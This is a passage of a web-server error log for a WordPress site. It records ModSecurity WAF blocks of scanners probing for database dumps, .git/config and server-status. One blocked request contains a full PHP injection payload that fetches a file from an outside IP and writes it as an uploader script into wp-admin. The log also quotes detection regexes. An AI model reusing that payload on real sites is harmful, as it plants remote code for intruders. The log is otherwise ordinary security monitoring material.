.resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/w.sql"] [unique_id "ZQirzGQl_jL8NwECt_y16gAAAJU"] [Mon Sep 18 16:39:43.370746 2023] [autoindex:error] [pid 1712:tid 140333081880320] [client 141.94.87.67:49094] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/PHPMailer/index.php [Mon Sep 18 16:39:43.474526 2023] [autoindex:error] [pid 1710:tid 140333224556288] [client 141.94.87.67:49096] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/PHPMailer/index.php [Mon Sep 18 18:16:10.638277 2023] [:error] [pid 1711:tid 140333190985472] [client 185.162.16.58:50530] [client 185.162.16.58] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/site.sql"] [unique_id "ZQjaOtkanKuAp6pXBU49lgAAAEU"] [Mon Sep 18 21:20:47.971059 2023] [authz_core:error] [pid 2378:tid 140333098665728] [client 164.90.205.35:52920] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/09/18 21:20:51 [error] 1670#1670: *25615 access forbidden by rule, client: 164.90.205.35, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Sep 18 21:37:35.554954 2023] [:error] [pid 2378:tid 140333039916800] [client 203.210.232.66:53170] [client 203.210.232.66] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/www.sql"] [unique_id "ZQkJb0HipaE6iino1h26BgAAANc"] [Tue Sep 19 00:13:27.017048 2023] [authz_core:error] [pid 1712:tid 140333216163584] [client 139.144.150.8:55152] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/09/19 00:13:31 [error] 1671#1671: *26880 access forbidden by rule, client: 139.144.150.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Sep 19 00:39:06.993156 2023] [authz_core:error] [pid 1710:tid 140333157414656] [client 161.35.27.144:55610] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/09/19 00:39:11 [error] 1671#1671: *27182 access forbidden by rule, client: 161.35.27.144, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Sep 19 01:02:38.210355 2023] [:error] [pid 2378:tid 140333107058432] [client 203.210.232.66:57100] [client 203.210.232.66] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/arx.sql"] [unique_id "ZQk5fkHipaE6iino1h27lgAAAM8"] [Tue Sep 19 03:41:25.487246 2023] [ssl:warn] [pid 9809:tid 140651724322688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 19 03:41:29.749836 2023] [ssl:warn] [pid 9811:tid 140651724322688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 19 03:41:30.532519 2023] [ssl:warn] [pid 9811:tid 140651724322688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 19 03:41:32.719301 2023] [ssl:warn] [pid 9811:tid 140651724322688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 19 03:41:35.057116 2023] [ssl:warn] [pid 10227:tid 140575853467520] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 19 03:41:37.244746 2023] [ssl:warn] [pid 10228:tid 140575853467520] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 19 03:41:38.043508 2023] [ssl:warn] [pid 10228:tid 140575853467520] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 19 08:30:40.639646 2023] [:error] [pid 10382:tid 140575428773632] [client 58.96.51.251:37966] [client 58.96.51.251] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/mysql.sql"] [unique_id "ZQmigKv5CpciGdYX6bGOSgAAAFQ"] [Tue Sep 19 12:11:47.045035 2023] [:error] [pid 16517:tid 140575428773632] [client 182.215.164.33:43790] [client 182.215.164.33] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/sql.sql"] [unique_id "ZQnWU4k1Bm2rI5EpDMDG7AAAARQ"] [Tue Sep 19 15:48:05.869085 2023] [:error] [pid 10383:tid 140575420380928] [client 109.90.121.217:48536] [client 109.90.121.217] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/1.sql"] [unique_id "ZQoJBR12flUYhLp1GVtycgAAAJU"] [Tue Sep 19 19:25:49.813017 2023] [:error] [pid 10382:tid 140575512700672] [client 208.102.168.75:53022] [client 208.102.168.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/back.sql"] [unique_id "ZQo8Dav5CpciGdYX6bGTBAAAAEo"] [Tue Sep 19 23:05:20.730398 2023] [:error] [pid 16692:tid 140575437166336] [client 173.225.4.194:56946] [client 173.225.4.194] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/123.sql"] [unique_id "ZQpvgP8CYrIrJN332P5qTAAAAdM"] [Tue Sep 19 23:36:59.153595 2023] [:error] [pid 16653:tid 140575395202816] [client 20.172.23.145:57446] [client 20.172.23.145] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZQp267La_zuo5wrRGaJ-jAAAAZg"], referer: www.google.com [Wed Sep 20 00:58:39.590390 2023] [autoindex:error] [pid 16611:tid 140575521093376] [client 51.68.11.215:58900] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/blue/index.php [Wed Sep 20 02:48:49.794327 2023] [:error] [pid 16517:tid 140575487522560] [client 185.162.16.58:60302] [client 185.162.16.58] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/dump.sql"] [unique_id "ZQqj4Yk1Bm2rI5EpDMDJLgAAAQ0"] 2023/09/20 03:37:23 [error] 10345#10345: *46774 connect() failed (111: Connection refused) while connecting to upstream, client: 89.22.235.226, server: investigacionperu.com, request: "GET /blog/ HTTP/1.0", upstream: "http://198.199.72.26:8181/blog/", host: "investigacionperu.com", referrer: "https://investigacionperu.com/blog/" [Wed Sep 20 03:37:23.594334 2023] [ssl:warn] [pid 16313:tid 140452306052992] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 20 03:37:25.797136 2023] [ssl:warn] [pid 16315:tid 140452306052992] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 20 03:37:26.447202 2023] [ssl:warn] [pid 16315:tid 140452306052992] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 20 03:37:29.595144 2023] [ssl:warn] [pid 16315:tid 140452306052992] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 20 03:37:31.887244 2023] [ssl:warn] [pid 16760:tid 139831117166464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 20 03:37:36.055134 2023] [ssl:warn] [pid 16762:tid 139831117166464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 20 10:41:47.096519 2023] [:error] [pid 17541:tid 139830926030592] [client 14.48.28.154:41052] [client 14.48.28.154] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/dumps.sql"] [unique_id "ZQsSu_0EBMkOm2MldkNfmAAAAME"] [Wed Sep 20 12:24:28.857181 2023] [autoindex:error] [pid 16784:tid 139830780458752] [client 192.185.81.101:42442] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/Text/index.php [Wed Sep 20 12:24:32.856337 2023] [autoindex:error] [pid 16783:tid 139830688139008] [client 192.185.81.101:42446] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/Text/index.php [Wed Sep 20 19:08:09.187061 2023] [:error] [pid 17541:tid 139830830814976] [client 208.102.168.75:50228] [client 208.102.168.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup.sql"] [unique_id "ZQuJaf0EBMkOm2MldkNjNgAAAMQ"] [Wed Sep 20 20:45:00.900576 2023] [autoindex:error] [pid 17541:tid 139830662960896] [client 206.189.89.39:52180] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Sep 20 20:45:08.591939 2023] [autoindex:error] [pid 16783:tid 139830738495232] [client 206.189.89.39:52182] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/09/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Sep 20 20:54:38.634360 2023] [autoindex:error] [pid 16784:tid 139830763673344] [client 206.189.89.39:52404] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Sep 20 23:12:28.881493 2023] [:error] [pid 16784:tid 139830934423296] [client 20.228.116.157:53890] [client 20.228.116.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:0x[]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: 0x0da found within ARGS:0x[]: 0x0day"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZQvCrJvDltDH4s9ngXMN2gAAAIA"] [Wed Sep 20 23:24:58.785008 2023] [:error] [pid 16784:tid 139830730102528] [client 211.196.38.227:54012] [client 211.196.38.227] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/a.sql"] [unique_id "ZQvFmpvDltDH4s9ngXMN4wAAAJA"] [Thu Sep 21 00:41:45.676952 2023] [:error] [pid 16782:tid 139830830814976] [client 66.85.146.50:55002] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Thu Sep 21 03:40:31.959475 2023] [ssl:warn] [pid 25197:tid 140586144069504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 21 03:40:36.186487 2023] [ssl:warn] [pid 25201:tid 140586144069504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 21 03:40:37.477784 2023] [ssl:warn] [pid 25201:tid 140586144069504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 21 03:40:39.668025 2023] [ssl:warn] [pid 25201:tid 140586144069504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 21 03:40:42.023546 2023] [ssl:warn] [pid 25645:tid 139707414513536] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 21 03:40:44.185282 2023] [ssl:warn] [pid 25649:tid 139707414513536] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 21 03:47:30.005470 2023] [:error] [pid 26293:tid 139706964571904] [client 208.102.168.75:58096] [client 208.102.168.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/archiv.sql"] [unique_id "ZQwDIsVt1Z376aPWyum64wAAANc"] [Thu Sep 21 08:08:57.488193 2023] [:error] [pid 26293:tid 139707090462464] [client 58.96.51.251:33584] [client 58.96.51.251] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ 